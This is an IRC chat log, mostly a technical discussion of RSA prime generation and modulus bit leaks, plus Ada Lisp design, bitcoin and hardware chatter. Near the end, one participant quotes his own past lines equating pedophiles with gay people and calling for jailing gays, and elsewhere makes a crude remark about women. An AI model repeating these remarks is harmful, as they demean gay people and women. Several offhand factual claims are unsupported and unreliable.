fg. 1737410;1510622007;mircea_popescu;yes. 1737411;1510622065;asciilifeform;afaik the only remaining, and most obvious 'loss' is the one implicit in prime number theorem ( where , wat, ~10k possible rng outputs correspond to same prime output ) 1737412;1510622104;mircea_popescu;http://btcbase.org/log/2017-11-13#1737262 << this is actually a pretty good approach. 1737413;1510622104;a111;Logged on 2017-11-13 19:29 phf: http://btcbase.org/log/2017-11-13#1737247 << it looks like a properly structured scheme evaluator, but it's ~explicitly~ lacking a native cons, which might be a very good exercise for whoever™ adding a static allocation space, adding mark-and-sweep, then all those To_Unbounded_String look like they can be simply search/replaced 1737414;1510622128;mircea_popescu;asciilifeform afaik "nextprime" or anything like it is not used 1737415;1510622180;asciilifeform;somewhat counterintuitively, you still get same result ( minus the time sidechannel leak, naturally ) 1737416;1510622198;asciilifeform;( there are still fewer primes than 2^4096bit phase space ) 1737417;1510622206;mircea_popescu;http://btcbase.org/log/2017-11-13#1737276 << safe bet natch. 1737418;1510622206;a111;Logged on 2017-11-13 19:40 asciilifeform: whole thing reads like straight translation from c 1737419;1510622210;asciilifeform;( 2048 rather. but you get the idea ) 1737420;1510622300;mircea_popescu;asciilifeform no, because see, if you don't use nextprime you lack the "nop bridge" so to speak. rolling number 6 does not take you to 7. to get 7 you need a natural 7, and this is equiprobable to rolling a natural 2^74207281-1 on the space of (0,2^74207281-1). 1737421;1510622338;mircea_popescu;(above quoted, largest prime known, found last year.) 1737422;1510622396;asciilifeform;now i recall having argued this myself, lol 1737423;1510622398;asciilifeform;yea 1737424;1510622441;mircea_popescu;:p 1737425;1510622465;mircea_popescu;very important NOT to use any kind of nextprime, as it turns out . 1737426;1510622498;*;asciilifeform somewhat addled with viral fevers, and strange dreams at night ( featuring such colourful characters as tov. ceaușescu ) 1737427;1510622529;mircea_popescu;i get odd viral influenzas in the first months of mingling with the whores of a new land also. 1737428;1510622549;asciilifeform;that at least has up-side 1737429;1510622550;mircea_popescu;but supposedly this makes you stronger. 1737430;1510623012;mircea_popescu;https://hackernoon.com/the-bitcoin-gauntlet-e9e721297aca in other materia obscura 1737431;1510623207;asciilifeform;http://its.svensson.org/m.f.d.(file) << in evenmoar obscura 1737432;1510623817;mircea_popescu;!!up hubud 1737433;1510623817;deedbot;hubud voiced for 30 minutes. 1737434;1510623851;mircea_popescu;o yea which reminds me : http://www.automobileromanesti.ro/images/mari/Altele/malaxa-1.jpg << romanian 1930s limo! 1737435;1510623871;mircea_popescu;allegedly teh soviets were so impressed with it packed the whole assembly line took it to russia in 1945 1737436;1510623893;mircea_popescu;(that site pretty decent ref of romanian vehicle production, incl de teardrop lulzitem) 1737437;1510624169;ben_vulpes;http://btcbase.org/log/2017-11-14#1737405 << currently working the 4th permutation of a 65536 byte message for a 32 bit hash 1737438;1510624169;a111;Logged on 2017-11-14 01:12 mircea_popescu: http://btcbase.org/log/2017-11-13#1737245 < ha! 1737439;1510624221;mircea_popescu;aha 1737440;1510624304;mircea_popescu;http://btcbase.org/log/2017-11-13#1737304 << was never discussed nor did i ever really grok it. 1737441;1510624304;a111;Logged on 2017-11-13 20:35 diana_coman: I can't seem to find in the logs any discussion re duplex construction/duplexing the sponge i.e. keccak's authors own proposal of using keccak for authenticated encryption; did anyone look into this? 1737442;1510624378;mircea_popescu;http://btcbase.org/log/2017-11-13#1737321 << this is a problem ; but perhaps opening it up to the market may be helpful.\ 1737443;1510624378;a111;Logged on 2017-11-13 20:57 asciilifeform: the boojum is that neither i nor anybody else knows of any rational way to quantify the compromise. 1737444;1510624386;mircea_popescu;if we had a way to quantify we could just decide. 1737445;1510624427;mircea_popescu;http://btcbase.org/log/2017-11-13#1737334 << nah, autospeaking bots to be kept at a minimum which is 0. 1737446;1510624427;a111;Logged on 2017-11-13 21:10 asciilifeform: ^ pheeature idea : why not have ticker autofire when the number moves >10% from last tick 1737447;1510624595;mircea_popescu;BingoBoingo shaping up. 1737448;1510624741;mircea_popescu;also, http://p.bvulpes.com/pastes/6Fybq/?raw=true 1737449;1510625135;hanbot; (asciilifeform's ticker idea) << nah, autospeaking bots to be kept at a minimum which is 0. << for the curious, why is say deedbot's rss announcer a non-auto event whereas a market movement isn't? 1737450;1510625172;mircea_popescu;history, pretty much. 1737451;1510625252;mircea_popescu;but if you wish to argue it in substance, the fiat valuation of bitcoin is broadly irrelevant -- to bitcoin, to the actrual things the fiat turds misclaim to represent, etcetera. whereas the penmanship of the l1 is relevant by definition. 1737452;1510625585;hanbot;that seems sound. 1737453;1510625779;mircea_popescu;meanwhile in doggy dishes, http://78.media.tumblr.com/222bfdf2af4f7c7417e869ba2ca093da/tumblr_n868fqJ7Sm1towumdo1_500.gif 1737454;1510627143;asciilifeform;http://btcbase.org/log/2017-11-14#1737435 << keep in mind, this was not a high bar -- ru soldiers took home even toilets from germany 1737455;1510627143;a111;Logged on 2017-11-14 01:44 mircea_popescu: allegedly teh soviets were so impressed with it packed the whole assembly line took it to russia in 1945 1737456;1510627477;asciilifeform;http://btcbase.org/log/2017-11-14#1737451 << i see the q of whether a coin buys a rowboat, a battleship, or entire flotilla, as broadly interesting one -- but mebbe that's just me 1737457;1510627477;a111;Logged on 2017-11-14 02:07 mircea_popescu: but if you wish to argue it in substance, the fiat valuation of bitcoin is broadly irrelevant -- to bitcoin, to the actrual things the fiat turds misclaim to represent, etcetera. whereas the penmanship of the l1 is relevant by definition. 1737458;1510627760;asciilifeform;( i could even readily believe that an , e.g., 25x rise in the heathenbux:btc exch rate would make no practical diff to mircea_popescu . but i suspect that i am not the only one here for whom it would make a palpable diff. ) 1737459;1510629194;mircea_popescu;10% dun buy any flotillas. 1737460;1510629303;mircea_popescu;afaic, i still have coins i paid like $2.10 for. 1737461;1510629552;asciilifeform;pretty sure i still have a coin i paid 0 for, lel 1737462;1510629597;asciilifeform;( it could buy a veeeery small, in a bottle , flotilla... ) 1737463;1510631904;lobbes;http://btcbase.org/log/2017-11-13#1737252 << I do plan to walk-back the logs and pull what still exists. Hard-drive space willing for being able to serve up the things on-demand (only ~40GB to work with on the VPS) 1737464;1510631904;a111;Logged on 2017-11-13 18:21 asciilifeform: lobbes: does this mean that you can mirror the whole zip collection nao ? 1737465;1510631909;lobbes;http://btcbase.org/log/2017-11-13#1737253 << time will tell. Depends on how much the logs-to-date worth of archives end up being in drive space. Bandwidth also a factor. Many things left to be sussed out. 1737466;1510631909;a111;Logged on 2017-11-13 18:32 BingoBoingo: lobbes: So modest is becoming less modest? 1737467;1510633938;BingoBoingo;Sexy or not? http://www.biostar.com.tw/app/en/mb/introduction.php?S_ID=856#specification 1737468;1510634037;BingoBoingo;!~later tell mircea_popescu http://wotpaste.cascadianhacker.com/pastes/cnUuO/?raw=true 1737469;1510634037;jhvh1;BingoBoingo: The operation succeeded. 1737470;1510634111;BingoBoingo;It looks like I'm going to be spending 2U on an Ubiquity Edgerouter Pro and an Ebuquity Edgeswitch lite, unless there are other ideas for networking hardware 1737471;1510634167;BingoBoingo;Under the guise of when visiting Shaman, buy cheapest that can move the traffic 1737472;1510635673;asciilifeform;BingoBoingo: default firmware is known-boobytrapped 1737473;1510635732;BingoBoingo;AMT bad or...? 1737474;1510635796;asciilifeform;a la microshit. 1737475;1510636302;BingoBoingo;The Ubiquiti or the Biostar 1737476;1510640054;BingoBoingo;!!up hubud 1737477;1510640055;deedbot;hubud voiced for 30 minutes. 1737478;1510640058;BingoBoingo;Hello hubud 1737479;1510640079;hubud;Hi 1737480;1510640109;BingoBoingo;Who is your daddy and what does he do? 1737481;1510640114;hubud;stumbled on trilema blog last week, been reading nearly nonstop since.. 1737482;1510640124;hubud;He's a goat farmer 1737483;1510640133;BingoBoingo;Does he love it? 1737484;1510640154;hubud;More or less 1737485;1510640161;BingoBoingo;Poor goats 1737486;1510640172;hubud;He treats them well 1737487;1510640237;BingoBoingo;Ah, love the goats, but indifference to the work of goats 1737488;1510640316;BingoBoingo;So, what's your favorite trilema piece so far? 1737489;1510640501;hubud;Problems of today 1737490;1510640506;hubud;or fabulous hash function 1737491;1510640512;hubud;still groking 1737492;1510640807;BingoBoingo;Just wait till you get to the classics 1737493;1510640902;hubud;Oh yeah, there are some juicy juicy ones 1737494;1510640940;hubud;Hard to find a sane btc community these days 1737495;1510641073;BingoBoingo;One you probably need to read sooner is http://trilema.com/anonimity-or-the-urban-versus-rural-dispute 1737496;1510641101;BingoBoingo;Critical for understanding WOT'tronics 1737497;1510642336;BingoBoingo;!!Up hubud 1737498;1510642336;deedbot;hubud voiced for 30 minutes. 1737499;1510642354;BingoBoingo;Perhaps register a key while you are here? You never know when you will need it. 1737500;1510642358;BingoBoingo;!!help 1737501;1510642358;deedbot;http://deedbot.org/help.html 1737502;1510642383;hubud;Thanks @BoingoBoingo 1737503;1510642827;BingoBoingo;De nada 1737504;1510643750;hubud;!!register pubkey-url http://wotpaste.cascadianhacker.com/pastes/kawMG/?raw=true 1737505;1510643750;deedbot;Provide a paste URL to the ascii-armored GPG public key or the full 40 character key fingerprint without spaces or dashes. 1737506;1510643810;hubud;!!register pubkey-url http://wotpaste.cascadianhacker.com/pastes/leKLW/?raw=true 1737507;1510643810;deedbot;Provide a paste URL to the ascii-armored GPG public key or the full 40 character key fingerprint without spaces or dashes. 1737508;1510643820;hubud;doesn't like my key 1737509;1510643880;hubud;!!register http://wotpaste.cascadianhacker.com/pastes/kawMG/?raw=true 1737510;1510643884;deedbot;2663CCEE8A986D69753970E5453FED117075F0A8 registered as hubud. 1737511;1510653921;davout;in other pedos http://archive.is/sTUZU#selection-7611.2-7611.137 1737512;1510654744;diana_coman;http://btcbase.org/log/2017-11-14#1737414 <- confirmed; I do NOT use any nextprime or other "rng"-parts from gpg; current rsatron prototype simply grabs nbits from fg, flips the 2 top bits and 1 bottom bit as per previous discussion and then checks if result is prime; if prime then keep, otherwise discard and try again; no "add 2 until prime" or other such thing 1737513;1510654744;a111;Logged on 2017-11-14 01:15 mircea_popescu: asciilifeform afaik "nextprime" or anything like it is not used 1737514;1510654943;diana_coman;and by "flips" I mean sets them to 1 1737515;1510657286;apeloyee;fwiw I just realized that this ^ leaks a little via the modulus 1737516;1510657329;apeloyee;if the modulus is M, then p,q>M/2^2048 (because p,q<2^2048) 1737517;1510657377;apeloyee;if "no leaks on principle", this needs to be dealt with 1737518;1510657446;apeloyee;can't see how to plug it completely though 1737519;1510657516;apeloyee;if M is say, 1.999999 * 2^2047, then ~20 first bits of p and q are known 1737520;1510657756;apeloyee;http://btcbase.org/log/2017-11-08#1734517 << not quite. for encryption, if I get your modulus, and you actually want to read my messages, I can generate a public exponent between M/2 and (say) 3M/4, and attach it to the message in plaintext. 1737521;1510657756;a111;Logged on 2017-11-08 22:03 asciilifeform: not knowing the e has exactly same effect as not knowing half of the n. 1737522;1510657791;apeloyee;assuming M is a modulus of a useful RSA key, this will work 1737523;1510657855;apeloyee;(i.e. M is not prime, and not single-digit) 1737524;1510658297;apeloyee;*p and q not signle digit 1737525;1510658548;spyked;http://btcbase.org/log/2017-11-13#1737268 <-- this. ftr, current adalisp prototype (not-yet-published and thus yet-vapourware!) represents "pointers" as indices in a statically-allocated array. 1737526;1510658548;a111;Logged on 2017-11-13 19:36 asciilifeform: and get rid of the pointers. 1737527;1510658711;apeloyee;grrr. "M is say, 1.999999 * 2^2047" << 2^4065, of course 1737528;1510658712;diana_coman;apeloyee, if I understand that correctly basically the only way to plug that leak would be to give up on diddling p and q, including setting size; which would mean just get random pairs of primes until their product fits the desired number of bits for the key; obv this lands into the trouble of having one of them too small 1737529;1510658756;spyked;http://btcbase.org/log/2017-11-13#1737264 <-- strings are (lisp) lists-of-characters. which, as it is, unfortunately makes parsing and evaluating builtin functions (e.g. cons, car, cdr) a pain in the ass. can be structured cleanly though. also, this makes it not a simple matter of find+replace in shithub scheme.adb. 1737530;1510658756;a111;Logged on 2017-11-13 19:35 asciilifeform: phf: ideally i'd get rid of Ada.Strings , full stop 1737531;1510658829;spyked;http://btcbase.org/log/2017-11-13#1737266 <-- I did not contemplate bytecode representation, but this would indeed make matters simpler (including above problem of dealing with strings). 1737532;1510658829;a111;Logged on 2017-11-13 19:36 asciilifeform: and rewrite the parser per se in scheme ( have it be present as commented bytecode constant ) 1737533;1510658955;spyked;http://btcbase.org/log/2017-11-13#1737294 <-- not sure if possible with ffatronic ada subset, though, because of "no dynamic objects" restriction. in my (yet-unpublished) prototype, lisp memory size is a static knob. 1737534;1510658955;a111;Logged on 2017-11-13 19:47 asciilifeform: and not 'as much as you want' but up to B bytes, with B given on commandline and stackframed on warmup. 1737535;1510659149;spyked;current lispm ads: http://p.bvulpes.com/pastes/8ROcg/?raw=true if teh real-life gods decide to leave my ass alone, I might publish the whole thing over the weekend. 1737536;1510659221;apeloyee;diana_coman: if keeping the minimum of 2^2047 for primes, you can, for example, generate primes between 2^2047 and 2^2049, and start over if the modulus is unacceptable. not sure what minimum for p and q makes sense. 1737537;1510659882;diana_coman;apeloyee, my first thought went that way but then on one hand this just makes the interval larger basically and on the other hand I have no idea how to even evaluate the compromise (i.e. how large interval is large enough anyway, leaving aside that the how big is big enough for p and q is not that terribly clear either -at least not to me); in other words I can see it as an improvement but I can't actually evaluate it clearly 1737538;1510660000;diana_coman;that being said, I can't quite see it being any *worse* than this affair with fixed size AND fixed top bits 1737539;1510660158;apeloyee;same here. 1737540;1510666395;mircea_popescu;!!withdraw 0.207429 165QE3hRB3x5781eQoxFjN1pdZndyzZJmv 1737541;1510666402;deedbot;Get your OTP: http://p.bvulpes.com/pastes/leYDe/?raw=true 1737542;1510668757;asciilifeform;http://btcbase.org/log/2017-11-14#1737520 << what keeps a million enemies from offering false pubexps in false conversations, preventing us from agreeing on a genuine one ? 1737543;1510668757;a111;Logged on 2017-11-14 11:09 apeloyee: http://btcbase.org/log/2017-11-08#1734517 << not quite. for encryption, if I get your modulus, and you actually want to read my messages, I can generate a public exponent between M/2 and (say) 3M/4, and attach it to the message in plaintext. 1737544;1510668846;mircea_popescu;asciilifeform there is no communication among unknown parties. someone somewhere gives you a key. 1737545;1510668859;asciilifeform;mircea_popescu: aha! 1737546;1510668899;asciilifeform;i was answering apeloyee's odd 'but i can give you my pubexp later, over unauthenticated plaintext, anywhere' oddity. 1737547;1510668934;mircea_popescu;a. yeah. 1737548;1510668965;asciilifeform;i.e. until we have one another's mods ~and~ pubexps! we're not really rsaparties. with all that flows from this. 1737549;1510669022;asciilifeform;http://btcbase.org/log/2017-11-14#1737528 <<< >>> http://btcbase.org/log/2017-11-14#1737387 1737550;1510669022;a111;Logged on 2017-11-14 11:25 diana_coman: apeloyee, if I understand that correctly basically the only way to plug that leak would be to give up on diddling p and q, including setting size; which would mean just get random pairs of primes until their product fits the desired number of bits for the key; obv this lands into the trouble of having one of them too small 1737551;1510669022;a111;Logged on 2017-11-14 01:09 asciilifeform: the way i'd implement the whole shebang, is simply to reject both primes if the highest bit of pq is not 1 . 1737552;1510669045;mircea_popescu;http://btcbase.org/log/2017-11-14#1737465 << i'd expect a few thousand items at 15kb each or so, so maybe 100mb total ? 1737553;1510669045;a111;Logged on 2017-11-14 03:58 lobbes: http://btcbase.org/log/2017-11-13#1737253 << time will tell. Depends on how much the logs-to-date worth of archives end up being in drive space. Bandwidth also a factor. Many things left to be sussed out. 1737554;1510669045;asciilifeform;imho ^ is The Right Thing, at least for folx who aren't generating keys in a burning hurry 1737555;1510669051;mircea_popescu;kinda curious how this bet works out irl. 1737556;1510669112;asciilifeform;and diana_coman , there is no 'trouble if one is too small', you throw out ~both~ if the test fails 1737557;1510669118;mircea_popescu;http://btcbase.org/log/2017-11-14#1737481 << lol. don't forget to come out for air, trilema is larger than what can be braved in one go. you'll break yourself. 1737558;1510669118;a111;Logged on 2017-11-14 06:15 hubud: stumbled on trilema blog last week, been reading nearly nonstop since.. 1737559;1510669284;diana_coman;asciilifeform, I meant in the final pair; i.e. you get p=3 and q=2^4095+1 sort of thing; ofc throw both in a pair if product not right size; but if not enforcing any size condition at all on p and q then you can end up with any small prime too 1737560;1510669301;asciilifeform;http://btcbase.org/log/2017-11-14#1737525 << this is therightthing. but note that not only is http://btcbase.org/log/2017-11-14#1737533 not a problem, but the behaviour is fundamental to ffa. in ada a structure is considered nondynamic if its size doesn't change at run time. not if 'magic number' size, like in overflowlang. 1737561;1510669301;a111;Logged on 2017-11-14 11:22 spyked: http://btcbase.org/log/2017-11-13#1737268 <-- this. ftr, current adalisp prototype (not-yet-published and thus yet-vapourware!) represents "pointers" as indices in a statically-allocated array. 1737562;1510669301;a111;Logged on 2017-11-14 11:29 spyked: http://btcbase.org/log/2017-11-13#1737294 <-- not sure if possible with ffatronic ada subset, though, because of "no dynamic objects" restriction. in my (yet-unpublished) prototype, lisp memory size is a static knob. 1737563;1510669344;asciilifeform;spyked: i use generic, which (quite unlike in cpp) results in a fully static structure that is created at runtime 1737564;1510669397;asciilifeform;diana_coman: calculate the probability of fatally small p or q. 1737565;1510669407;asciilifeform;in an honest rng 1737566;1510669456;mircea_popescu;http://btcbase.org/log/2017-11-14#1737511 << amply discussed here, "pedos the next gay-like oppressed community". 1737567;1510669456;a111;Logged on 2017-11-14 10:05 davout: in other pedos http://archive.is/sTUZU#selection-7611.2-7611.137 1737568;1510669462;diana_coman;asciilifeform, for starters I don't know what is "large enough" aka "not fatally small" p or q 1737569;1510669471;asciilifeform;understand, setting the top bit won't help you, i can just as easily say 'but what if the middle 2000 bits in my prime end up zeros!' 1737570;1510669475;mircea_popescu;fortunately for everyone, the state of the needy is croaking before managing to complete its self-defined mission. 1737571;1510669529;mircea_popescu;http://btcbase.org/log/2017-11-14#1737516 << this is no leak ; it is a restatement of "first two bits set to 11, so you only use 2045 bit keys" 1737572;1510669529;a111;Logged on 2017-11-14 11:02 apeloyee: if the modulus is M, then p,q>M/2^2048 (because p,q<2^2048) 1737573;1510669541;davout;mircea_popescu: i remembered mostly the "pedos as afraid of women who'll identify them as beta cux" 1737574;1510669552;mircea_popescu;yes, you can expect that your modulus will lead 10 more often than 11. but this is in the book already. 1737575;1510669572;mircea_popescu;davout ima deal with this prime thing then fish out the convos if you'd like. 1737576;1510669592;asciilifeform;diana_coman: generally speaking, anything one could conceivably walk over, is unsafe - i.e. primes smaller than the number of femtoseconds in a millenium, if i had to give a heuristic 1737577;1510669598;davout;prime things first 1737578;1510669689;mircea_popescu;http://btcbase.org/log/2017-11-14#1737519 << let's keep this binary. are you saying that if the first 2 octets of N are 1 therefore the first 2 octets of BOTH p and q must also be 1 ? 1737579;1510669689;a111;Logged on 2017-11-14 11:05 apeloyee: if M is say, 1.999999 * 2^2047, then ~20 first bits of p and q are known 1737580;1510669701;asciilifeform;the other thing, diana_coman , is that if enemy knows that you will never use a p or q below limit l -- he can start bruting from l 1737581;1510669713;asciilifeform;so pegging primes min size does 0. 1737582;1510669740;diana_coman;asciilifeform, myeah, hence my "what does it even do for me simply making this interval larger" 1737583;1510669750;asciilifeform;mircea_popescu: octets?? 1737584;1510669755;mircea_popescu;bytes 1737585;1510669769;mircea_popescu;i have a serious issue with bit/byte confusion trying to get myself out of it somehow. 1737586;1510669785;mircea_popescu;ftr, octet is the fucking right word for 8 bits. a byte should be 64 bits these days. 1737587;1510669796;mircea_popescu;literally, what the machine bytes. 1737588;1510669830;asciilifeform;let's settle another matter -- which bit is 'first' 1737589;1510669847;mircea_popescu;left to right. most significant bit first. 1737590;1510669867;asciilifeform;aite 1737591;1510669869;mircea_popescu;mathematical ordering. 1737592;1510669886;*;asciilifeform often says 'eldest' , as in ru 1737593;1510669890;mircea_popescu;works. 1737594;1510669909;*;diana_coman found herself using "octet" in code because of going nuts with bytes/bits otherwise 1737595;1510669916;mircea_popescu;anyway, the same problem exists in the tail : if N is 000000001 at the end, i know BOTH p and q were 11111111 last 8 bit 1737596;1510669925;mircea_popescu;diana_coman ikr! 1737597;1510669942;asciilifeform;problem only properly exists in the tail ('youngest') bit, where carry is 0 1737598;1510669974;mircea_popescu;also exists in head. 1737599;1510669974;mircea_popescu;the only way to have an N = 11111111.... is if both q and p are 1111111...... 1737600;1510669980;asciilifeform;observe, you cannot say anything re p,q from he middle bits of pq (or rsa would be useless) 1737601;1510669993;asciilifeform;mircea_popescu: nope. carry exists. 1737602;1510669997;asciilifeform;srsly try it 1737603;1510670028;mircea_popescu;11111111×11111111 = 1111111000000001 1737604;1510670035;mircea_popescu;sometimes i suspect you never do binary calculation at all asciilifeform 1737605;1510670054;asciilifeform;where's the ... in there 1737606;1510670060;asciilifeform;this is sloppy thinking 1737607;1510670067;mircea_popescu;11111111.....×11111111.... = 1111111..... 1737608;1510670098;mircea_popescu;1111111100000000×1111111100000000 = 11111110000000010000000000000000 if you much prefer. 1737609;1510670108;asciilifeform;ok i misread a leading ... 1737610;1510670120;asciilifeform;otherwise yes 1737611;1510670153;mircea_popescu;anyway, there's entirely no way out of this. for purely mathematical reasons. 1737612;1510670163;mircea_popescu;however you "cut" the problem out, the surface of the cut becomes the problem 1737613;1510670170;mircea_popescu;and it will be larger than this surface. 1737614;1510670250;mircea_popescu;of course, the odds of getting a FF FF q and a FF FF p are 1/2^32 1737615;1510670263;mircea_popescu;which is to say, small. 1737616;1510670268;*;asciilifeform doesn't expect to see a pill against this, other than he already obvious engineering margin of using respectable number of bits of entropy for whole thing 1737617;1510670277;asciilifeform;*the already 1737618;1510670285;mircea_popescu;kinda why we have 2045 "even if less would be enough" 1737619;1510670289;asciilifeform;aha. 1737620;1510670302;mircea_popescu;there ~are~ extension attacks, but those typically require more than a dozen bits known. 1737621;1510670364;mircea_popescu;(on proper rng. on bs prng / kochgpg etc, they don't.) 1737622;1510670382;mircea_popescu;kinda why faux rng calibration is done on 1blocks in the first place. 1737623;1510670414;mircea_popescu;"all you need to know is where the signature 1blocks come in the "rng", as they will be preserved by binary mult, can be seen in modulus." 1737624;1510670444;asciilifeform;iirc most recent black magic gives you polynomialtime breakage if >=.22b of bitness b of p or q bits are known 1737625;1510670469;asciilifeform;( bottom or top consec. bits ) 1737626;1510670513;mircea_popescu;afaik "shadow brokers" didn't release this principal rsa exploitation tool of "teh equation group", but : imagine you have a machine a) working on your own special-purpose made prng ; and b) generating rsa keys all the time and on call. 1737627;1510670523;mircea_popescu;you now look for the signature blocks of a in b, and have the whole show. 1737628;1510670625;asciilifeform;generally there are cheaper ways to make use of 'key' to chump rng 1737629;1510670642;mircea_popescu;hey, money is no object empire. 1737630;1510670668;mircea_popescu;moreover, VERY GOOD (for some purposes) prngs are eminently sign-block-ing. 1737631;1510670692;mircea_popescu;nobody cares for as long as they're used for what they're intended to be used, such as reproducible scientific simulation. 1737632;1510670693;asciilifeform;the archetypical example is 'digits of pi' 1737633;1510670707;mircea_popescu;asciilifeform nah, pi is not periodic. 1737634;1510670727;asciilifeform;dun need periodicity for rng diddle, necessarily 1737635;1510670739;mircea_popescu;in the scheme discussed above, periodicity is specifically the point. 1737636;1510670744;asciilifeform;or mircea_popescu was thinking of the particular one illustrated earlier 1737637;1510670746;asciilifeform;aa 1737638;1510670838;asciilifeform;reminds me, not long before the beginning of the time of dulap troubles, and the isp winter, asciilifeform was experimenting with statistical tests of the ~moduli~ a la dieharder 1737639;1510670922;asciilifeform;looking for any kind of outliers by any conceivable measure 1737640;1510670947;asciilifeform;within a given bitness category 1737641;1510670967;asciilifeform;but this is a thread for another time. 1737642;1510670978;mircea_popescu;the problem here is structure, you have to have the "emitter" pretty well identified to make useful pattern measurements. 1737643;1510670988;mircea_popescu;this, amusingly, is an exact rehash of your antenna detection discussion 1737644;1510670993;mircea_popescu;(as it's exactly what it is) 1737645;1510671060;mircea_popescu;http://btcbase.org/log/2017-11-14#1737536 << this was part of the original speccing of "unequal length p, q" etc. that line of thought withered and died, see the whole thing in the log it's worth the read. 1737646;1510671060;a111;Logged on 2017-11-14 11:33 apeloyee: diana_coman: if keeping the minimum of 2^2047 for primes, you can, for example, generate primes between 2^2047 and 2^2049, and start over if the modulus is unacceptable. not sure what minimum for p and q makes sense. 1737647;1510671079;mircea_popescu;though /me is consoled to see bright minds have the same intuitive inclination. 1737648;1510671093;asciilifeform;i'ma half a mind to build that antenna , btw, and see how long before confiscated 1737649;1510671102;asciilifeform;betcha it could live for years. 1737650;1510671130;mircea_popescu;http://btcbase.org/log/2017-11-14#1737538 << it's worse in that the per-unit-effort benefit it delivers is smaller than the benefit we would accrue by simply keeping the current system and increasing the bitsize. 1737651;1510671130;a111;Logged on 2017-11-14 11:46 diana_coman: that being said, I can't quite see it being any *worse* than this affair with fixed size AND fixed top bits 1737652;1510671176;mircea_popescu;asciilifeform very likely. you're a person of interest, what, who\s gonna confiscate your shit. 1737653;1510671184;asciilifeform;lol 1737654;1510671224;mircea_popescu;the fundamental imperial problem (see eg http://btcbase.org/log/2017-11-04#1732837 ) is that good imperial can never act for fear waiting may pay more. 1737655;1510671224;a111;Logged on 2017-11-04 14:22 mircea_popescu: consider the following point : the recent las vegas shooter had bought a room ; and had ferried a quarter ton of materiel up there ; and then the concert started, and he sat. 1737656;1510671283;diana_coman;mircea_popescu, there is that 1737657;1510671352;asciilifeform;in sadder noose, cheapest bolix ivory microscopy quote, chinese, that covers all the layers ( metal and passivation ) is ~30,000 usd. 1737658;1510671353;mircea_popescu;this is the problem with "complexify the code machine" tendency. somehow it appears intuitively evident that having a portion of the code INSIDE the machine is "a more complex, therefore a more secure system". it is not. 100% of the key belongs in the key. 1737659;1510671367;mircea_popescu;this is the fundamental, and perhaps only result to date of cryptology. 1737660;1510671419;mircea_popescu;asciilifeform give it a decade. 1737661;1510671422;mircea_popescu;:D! 1737662;1510671438;mircea_popescu;(there's a reason imperials have that problem -- it's called "technological progress".) 1737663;1510671454;asciilifeform;it's mostly manual work, mircea_popescu 1737664;1510671461;asciilifeform;so cost dun move much 1737665;1510671470;asciilifeform;the microscope per se is 1940s tech. 1737666;1510671472;mircea_popescu;oh, you mean like warehouse management ? 1737667;1510671477;mircea_popescu;or like driving ? 1737668;1510671479;mircea_popescu;OR PLAYING GO ? 1737669;1510671480;asciilifeform;no, like appendectomy. 1737670;1510671482;mircea_popescu;dun dun DUN! 1737671;1510671514;mircea_popescu;it will sadden you to find surgery is highly roboticized, in the sense of ~60% of surgeon man-hours put in by 1967 surgeons are now done by machine. 1737672;1510671516;asciilifeform;it's a surgery, d00d strips carefully the layers , takes pics 1737673;1510671544;asciilifeform;aha and the 40 remaining % gets to charge same or moar 1737674;1510671552;mircea_popescu;same or moar in today's dollah. 1737675;1510671555;asciilifeform;because the talent pool aint any bigger 1737676;1510671560;mircea_popescu;which evidently can't buy any flotillas. 1737677;1510671568;asciilifeform;separate item neh 1737678;1510671572;mircea_popescu;(if it could -- usg would have some) 1737679;1510671581;mircea_popescu;asciilifeform not so separate. wait a decade, bitcoin appreciates. 1737680;1510671612;asciilifeform;i can't picture it appreciating to the point where i can spare 30k worth of it 1737681;1510671646;mircea_popescu;poor people can't picture how richdom goes! 1737682;1510671671;mircea_popescu;http://btcbase.org/log/2017-11-14#1737387 << this is alternatively a perfectly acceptable approach ; expensive as all fuck though. prolly should be the standard for homemade keys. 1737683;1510671671;a111;Logged on 2017-11-14 01:09 asciilifeform: the way i'd implement the whole shebang, is simply to reject both primes if the highest bit of pq is not 1 . 1737684;1510671974;asciilifeform;re 30k, it's moar than enuff for own motherfucking microscope 1737685;1510672002;asciilifeform;supposing i had where to keep one, and weren't gearing up for escape 1737686;1510672028;asciilifeform;( a preowned SEM is mebbe 10k ) 1737687;1510672085;asciilifeform;sorta lulzy to learn that a day of bulldozering costs moar than a used bulldozer. 1737688;1510672156;mircea_popescu;davout re pedo discussion : http://btcbase.org/log/2017-06-30#1677971 ; http://btcbase.org/log/2017-05-07#1652534 ; http://btcbase.org/log/2017-05-03#1651425 ; http://btcbase.org/log/2017-02-21#1616334 ; http://btcbase.org/log/2015-04-30#1116819 ; http://btcbase.org/log/2015-03-06#1043675 ; http://btcbase.org/log/2015-02-24#1032677 ; http://btcbase.org/log/2015-02-24#1032676 ; as well as period lulz such as http://btcbase.org 1737689;1510672156;a111;Logged on 2017-06-30 23:00 mircea_popescu: much saner to put all gays in jail because "they offend baby jezuz" than to put all pedos in jail because "they harm little kids" 1737690;1510672156;a111;Logged on 2017-05-07 05:09 mircea_popescu: BingoBoingo i'm preparing popcorn for when they finally unearth the pedophilia issue. so far swimming in the brackish water of imaginary problems that are only problems ot the problemizers. 1737691;1510672156;a111;Logged on 2017-05-03 19:26 mircea_popescu: Framedragger "have you tried not wanting to fuck guys???" whadda ya know, next they'll "cure" pedos. because they're so totally unlike gays and everything. 1737692;1510672156;a111;Logged on 2017-02-21 22:18 mircea_popescu: hence all the discussions re "fags got their weddings, pedos are next". 1737693;1510672156;a111;Logged on 2015-04-30 15:40 mircea_popescu: incidentally, the original (mostly politically driven) explanation for violence against homosexuals - some sort of "homophobia" suffers a lot seeing how ALL SORTS of other sexual behaviours elicit the same violent response. such as transsexualism, or pedophilia. 1737694;1510672156;a111;Logged on 2015-03-06 01:01 mircea_popescu: the very notion that the us has any sort of purpose, not even conscious or expressible, but any sort whatsoever is ridiculous on its face. it has all the purpose of a shambling headless zombie. which is why they're stuck trying to invent nonsense, "women and gayz! anti pedo!!" etc. 1737695;1510672156;a111;Logged on 2015-02-24 21:00 mircea_popescu: who cares that pedo today ==== faggot 1965. 1737696;1510672156;a111;Logged on 2015-02-24 21:00 mircea_popescu: the gays got their way with marriage prior to the freeze, but that's it. pedos aren't getting theirs. 1737697;1510672156;mircea_popescu;/log/2014-05-10#669753 1737698;1510672170;mircea_popescu;there's prolly some stuff on trilema too but too lazy to dig moar. shoulds suffice i guess. 1737699;1510672190;asciilifeform;last link got cut 1737700;1510672213;mircea_popescu;oh i thought that couldn't happen! 1737701;1510672219;asciilifeform;lel 